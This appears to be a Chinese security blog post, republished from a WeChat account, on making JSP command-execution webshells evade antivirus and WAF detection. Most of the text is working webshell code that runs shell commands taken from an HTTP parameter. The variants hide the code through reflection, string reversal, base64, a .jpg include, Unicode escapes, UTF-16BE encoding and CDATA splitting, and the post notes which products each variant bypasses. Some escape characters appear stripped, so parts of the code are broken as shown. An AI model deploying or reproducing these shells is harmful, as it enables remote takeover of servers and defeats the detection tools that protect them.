前言
php的一句话木马即可以直接命令执行又可以作为冰蝎、蚁剑的客户端,而java就显得比较复杂。在经过java基础学习之后,尝试对java命令执行的webshell进行免杀处理。
命令执行
在之前的 Java 命令执行[1] 中学习了执行系统命令的几个类。这次我们还是以经典的Runtime类来测试。
<%@ page language="java" contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"%><%@ page import="java.io.*"%><%out.print(System.getProperty("os.name").toLowerCase());String cmd = request.getParameter("cmd");if(cmd != null){Process p = Runtime.getRuntime().exec(new String[]{"cmd.exe","/c",cmd});InputStream input = p.getInputStream();InputStreamReader ins = new InputStreamReader(input, "GBK");BufferedReader br = new BufferedReader(ins);out.print("<pre>");String line;while((line = br.readLine()) != null) {out.println(line);}out.print("</pre>");br.close();ins.close();input.close();p.getOutputStream().close();}%>
该文件有着明显的exec危险代码。
反射
利用反射来免杀webshell是常用技术之一。反射的编写过程参考Java 反射机制学习[2]
<%@ page language="java" contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"%><%@ page import="java.io.*"%><%@ page import="java.lang.reflect.Constructor" %><%@ page import="java.lang.reflect.Method" %><%out.print(System.getProperty("os.name").toLowerCase());String cmd = request.getParameter("cmd");if(cmd != null){Class clazz = Class.forName("java.lang.Runtime");Constructor declaredConstructor = clazz.getDeclaredConstructor();declaredConstructor.setAccessible(true);Object o = declaredConstructor.newInstance();Method show = clazz.getDeclaredMethod("exec", String[].class);String[] cmds = new String[]{"cmd.exe","/c",cmd};Object invoke = show.invoke(o,(Object)cmds);Process p = (Process) invoke;InputStream input = p.getInputStream();InputStreamReader ins = new InputStreamReader(input, "GBK");BufferedReader br = new BufferedReader(ins);out.print("<pre>");String line;while((line = br.readLine()) != null) {out.println(line);}out.print("</pre>");br.close();ins.close();input.close();p.getOutputStream().close();}%>
还可以通过base64编码的方式将关键字符串java.lang.Runtime编码起来。
String a = new String(Base64.getDecoder().decode("amF2YS5sYW5nLlJ1bnRpbWU="));System.out.println(a);
又或者创建一个方法来反转字符串。
<%@ page language="java" contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"%><%@ page import="java.io.*"%><%@ page import="java.lang.reflect.Constructor" %><%@ page import="java.lang.reflect.Method" %><%!public static String reverseStr(String str){return new StringBuilder(str).reverse().toString();}%><%out.print(System.getProperty("os.name").toLowerCase());String cmd = request.getParameter("cmd");if(cmd != null){Class clazz = Class.forName(reverseStr("emitnuR.gnal.avaj"));Constructor declaredConstructor = clazz.getDeclaredConstructor();declaredConstructor.setAccessible(true);Object o = declaredConstructor.newInstance();Method show = clazz.getDeclaredMethod(reverseStr("cexe"), String[].class);String[] cmds = new String[]{"cmd.exe","/c",cmd};Object invoke = show.invoke(o,(Object)cmds);Process p = (Process) invoke;InputStream input = p.getInputStream();InputStreamReader ins = new InputStreamReader(input, "GBK");BufferedReader br = new BufferedReader(ins);out.print("<pre>");String line;while((line = br.readLine()) != null) {out.println(line);}out.print("</pre>");br.close();ins.close();input.close();p.getOutputStream().close();}%>
include 指令
Java Web 里有一个include指令,可以将外部文件嵌入到当前jsp语句中,并同时解析页面的jsp语句。
<%@ page language="java" contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"%><%@ page import="java.io.*"%><%@ page import="java.lang.reflect.Constructor" %><%@ page import="java.lang.reflect.Method" %><%@ include file = "1.jpg" %>
1.jpg 编写恶意代码。
<%out.print(System.getProperty("os.name").toLowerCase());String cmd = request.getParameter("cmd");if(cmd != null){Class clazz = Class.forName("java.lang.Runtime");Constructor declaredConstructor = clazz.getDeclaredConstructor();declaredConstructor.setAccessible(true);Object o = declaredConstructor.newInstance();Method show = clazz.getDeclaredMethod("exec", String[].class);String[] cmds = new String[]{"cmd.exe","/c",cmd};Object invoke = show.invoke(o,(Object)cmds);Process p = (Process) invoke;InputStream input = p.getInputStream();InputStreamReader ins = new InputStreamReader(input, "GBK");BufferedReader br = new BufferedReader(ins);out.print("<pre>");String line;while((line = br.readLine()) != null) {out.println(line);}out.print("</pre>");br.close();ins.close();input.close();p.getOutputStream().close();}%>
访问也是可以正常执行命令。
因为安全狗、D盾主要查杀Runtime.getRuntime().exec(),在使用include的情况下可以绕过D盾无法绕过安全狗。当再次利用反射机制就可以成功绕过。
编码
Java 程序可以自动识别Unicode编码,所以我们可以将java源代码除了page指令的代码外,全部编码。先在网上查找一个字符串与Unicode编码相互转换的类。
public void convert(String str) {str = (str == null ? "" : str);String tmp;StringBuffer sb = new StringBuffer(1000);char c;int i, j;sb.setLength(0);for (i = 0; i < str.length(); i++) {c = str.charAt(i);sb.append("\u");j = (c >>> 8); //取出高8位tmp = Integer.toHexString(j);if (tmp.length() == 1)sb.append("0");sb.append(tmp);j = (c & 0xFF); //取出低8位tmp = Integer.toHexString(j);if (tmp.length() == 1)sb.append("0");sb.append(tmp);}System.out.print(new String(sb));}
再创建一个方法,通过读取文本文件的方式调用convert()方法将上面的命令执行的代码编码。
public void test2() throws IOException {File srcfile = new File("a.txt");FileReader fileReader = new FileReader(srcfile);BufferedReader bufferedReader = new BufferedReader(fileReader);String s;while ((s = bufferedReader.readLine()) != null) {convert(s);System.out.print("rn");}}
运行后得到Unicode编码后的代码,再把原来page指令声明上即可。
<%@ page language="java" contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"%><%@ page import="java.io.*"%><%u006fu0075u0074u002eu0070u0072u0069u006eu0074u0028u0053u0079u0073u0074u0065u006du002eu0067u0065u0074u0050u0072u006fu0070u0065u0072u0074u0079u0028u0022u006fu0073u002eu006eu0061u006du0065u0022u0029u002eu0074u006fu004cu006fu0077u0065u0072u0043u0061u0073u0065u0028u0029u0029u003bu0053u0074u0072u0069u006eu0067u0020u0020u0063u006du0064u0020u003du0020u0072u0065u0071u0075u0065u0073u0074u002eu0067u0065u0074u0050u0061u0072u0061u006du0065u0074u0065u0072u0028u0022u0063u006du0064u0022u0029u003bu0069u0066u0028u0063u006du0064u0020u0021u003du0020u006eu0075u006cu006cu0029u007bu0020u0020u0020u0020u0050u0072u006fu0063u0065u0073u0073u0020u0070u0020u003du0020u0020u0052u0075u006eu0074u0069u006du0065u002eu0067u0065u0074u0052u0075u006eu0074u0069u006du0065u0028u0029u002eu0065u0078u0065u0063u0028u006eu0065u0077u0020u0053u0074u0072u0069u006eu0067u005bu005du007bu0022u0063u006du0064u002eu0065u0078u0065u0022u002cu0022u002fu0063u0022u002cu0063u006du0064u007du0029u003bu0020u0020u0020u0020u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0020u0069u006eu0070u0075u0074u0020u003du0020u0070u002eu0067u0065u0074u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0028u0029u003bu0020u0020u0020u0020u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0052u0065u0061u0064u0065u0072u0020u0069u006eu0073u0020u003du0020u006eu0065u0077u0020u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0052u0065u0061u0064u0065u0072u0028u0069u006eu0070u0075u0074u002cu0020u0022u0047u0042u004bu0022u0029u003bu0020u0020u0020u0020u0042u0075u0066u0066u0065u0072u0065u0064u0052u0065u0061u0064u0065u0072u0020u0062u0072u0020u003du0020u006eu0065u0077u0020u0042u0075u0066u0066u0065u0072u0065u0064u0052u0065u0061u0064u0065u0072u0028u0069u006eu0073u0029u003bu0020u0020u0020u0020u006fu0075u0074u002eu0070u0072u0069u006eu0074u0028u0022u003cu0070u0072u0065u003eu0022u0029u003bu0020u0020u0020u0020u0053u0074u0072u0069u006eu0067u0020u006cu0069u006eu0065u003bu0020u0020u0020u0020u0077u0068u0069u006cu0065u0028u0028u006cu0069u006eu0065u0020u003du0020u0062u0072u002eu0072u0065u0061u0064u004cu0069u006eu0065u0028u0029u0029u0020u0021u003du0020u006eu0075u006cu006cu0029u0020u007bu0020u0020u0020u0020u0020u0020u0020u0020u006fu0075u0074u002eu0070u0072u0069u006eu0074u006cu006eu0028u006cu0069u006eu0065u0029u003bu0020u0020u0020u0020u007du0020u0020u0020u0020u006fu0075u0074u002eu0070u0072u0069u006eu0074u0028u0022u003cu002fu0070u0072u0065u003eu0022u0029u003bu0020u0020u0020u0020u0062u0072u002eu0063u006cu006fu0073u0065u0028u0029u003bu0020u0020u0020u0020u0069u006eu0073u002eu0063u006cu006fu0073u0065u0028u0029u003bu0020u0020u0020u0020u0069u006eu0070u0075u0074u002eu0063u006cu006fu0073u0065u0028u0029u003bu0020u0020u0020u0020u0070u002eu0067u0065u0074u004fu0075u0074u0070u0075u0074u0053u0074u0072u0065u0061u006du0028u0029u002eu0063u006cu006fu0073u0065u0028u0029u003bu007d%>
D盾依然可以查杀,安全狗顺利绕过。那么Unicode 编码还能怎么处理呢?Unicode编码的关键点在于以’u’开头表明和unicode编码相关。可以将’u’重复声明,即’uuuuuuu’
<%out.println("uuuuuu006fuuuuuuuuuuuuuuuuuu0075uuu0074");%>
将上面代码稍做调整
sb.append("\uuuuu");再次生成webshell,可成功绕过D盾。
java 同样支持其他编码格式
import chardetimport codecsfilename_in = 'webshell.txt'filename_out = 'utf-16be_es.jsp'with codecs.open(filename=filename_in, mode='r', encoding='utf-8') as fi:data = fi.read()with open(filename_out, mode='w') as fo:fo.write('<%@ page contentType="charset=utf-16be" %>')fo.write(data.encode('utf-16be'))fo.close()
如 utf-16be 编码方式
扩展
在绕过某些WAF时,WAF可能会检测jsp标签、客户端传入的参数以及威胁命令。对应jsp标签<%%>,可以使用<jsp:scriptlet></jsp:scriptlet>代替。且不需要import导入,定义完整的类名。
<jsp:scriptlet>out.print(System.getProperty("os.name").toLowerCase());String cmd = request.getParameter("cmd");if(cmd != null){Class clazz = Class.forName("java.lang.Runtime");java.lang.reflect.Constructor declaredConstructor = clazz.getDeclaredConstructor();declaredConstructor.setAccessible(true);Object o = declaredConstructor.newInstance();java.lang.reflect.Method show = clazz.getDeclaredMethod("exec", String[].class);String[] cmds = new String[]{"cmd.exe","/c",cmd};Object invoke = show.invoke(o,(Object)cmds);Process p = (Process) invoke;java.io.InputStream input = p.getInputStream();java.io.InputStreamReader ins = new java.io.InputStreamReader(input, "GBK");java.io.BufferedReader br = new java.io.BufferedReader(ins);String line;while((line = br.readLine()) != null) {out.println(line);}br.close();ins.close();input.close();p.getOutputStream().close();}</jsp:scriptlet>
对于参数先将其存储进会话然后调用。
request.setAttribute("a",request.getParameter("cmd"));String cmd = request.getAttribute("a").toString();
如果检测威胁命令可以对其进行编码,这里选择ASCII编码进行测试。对应服务端代码该为:
String decode = java.net.URLDecoder.decode(cmd.replaceAll("\\x", "%"), "utf-8");String[] cmds = new String[]{"cmd.exe","/c",decode};
此时既可以输入whoami,也可以输入十六进制编码后的%5c%78%37%37%5c%78%36%38%5c%78%36%66%5c%78%36%31%5c%78%36%64%5c%78%36%39
或者base64编码加反转等等都可以。
<%@ page language="java" contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"%><%@ page import="java.io.*"%><%@ page import="java.util.Base64" %><%@ page import="java.lang.reflect.Constructor" %><%@ page import="java.lang.reflect.Method" %><%!public static String reverseStr(String str){return new StringBuilder(str).reverse().toString();}%><%out.print(System.getProperty("os.name").toLowerCase());String bs64 = request.getParameter("cmd");if(bs64 != null){String cmd = new String(Base64.getDecoder().decode(reverseStr(bs64)),"UTF-8");Class clazz = Class.forName("java.lang.Runtime");Constructor declaredConstructor = clazz.getDeclaredConstructor();declaredConstructor.setAccessible(true);Object o = declaredConstructor.newInstance();Method show = clazz.getDeclaredMethod("exec", String[].class);String[] cmds = new String[]{"cmd.exe","/c",cmd};Object invoke = show.invoke(o,(Object)cmds);Process p = (Process) invoke;InputStream input = p.getInputStream();InputStreamReader ins = new InputStreamReader(input, "GBK");BufferedReader br = new BufferedReader(ins);out.print("<pre>");String line;while((line = br.readLine()) != null) {out.println(line);}out.print("</pre>");br.close();ins.close();input.close();p.getOutputStream().close();}%>
对应客户端传入的命令也就是base64编码后反转的字符串。
CDATA特性
被<![CDATA[]]>这个标记所包含的内容将表示为纯文本,java 同样支持该特性。
<?xml version="1.0" encoding="UTF-8"?><jsp:root xmlns:jsp="http://java.sun.com/JSP/Page"version="1.2"><jsp:directive.page contentType="text/html"/><jsp:declaration></jsp:declaration><jsp:scriptlet><![CDATA[o]]>u<![CDATA[t.writ]]><![CDATA[e]]>("123!");out.print(System.getProperty("os.name").toLowerCase());String cmd = <![CDATA[re]]>q<![CDATA[uest.getPar]]><![CDATA[ameter]]>("cmd");if(cmd != null){Class clazz = Class.forName("java.lang.Runtime");java.lang.reflect.Constructor declaredConstructor = clazz.getDeclaredConstructor();declaredConstructor.setAccessible(true);Object o = declaredConstructor.newInstance();java.lang.reflect.Method show = <![CDATA[cla]]>z<![CDATA[z.getDec]]><![CDATA[laredMethod]]>("exec", String[].class);String[] cmds = new String[]{"cmd.exe","/c",cmd};Object invoke = show.invoke(o,(Object)cmds);Process p = (Process) invoke;java.io.InputStream input = p.getInputStream();java.io.InputStreamReader ins = new java.io.InputStreamReader(input, "GBK");java.io.BufferedReader br = new java.io.BufferedReader(ins);String line;while((line = br.readLine()) != null) {out.println(line);}br.close();ins.close();input.close();p.getOutputStream().close();}</jsp:scriptlet><jsp:text></jsp:text></jsp:root>
总结
本文免杀的方式主要利用的知识点是反射和编码,可以达到简单免杀的效果。算是一个学习的切入口。在实际更为复杂的情况下,还要继续学习以类加载器等更多方式进行免杀处理。
References
[1] Java 命令执行: https://www.jianshu.com/p/05ea5142b2a4[2] Java 反射机制学习: https://www.jianshu.com/p/0a92aa558bc3
原文始发于微信公众号(Wings安全团队):Jsp Webshell 免杀-命令执行
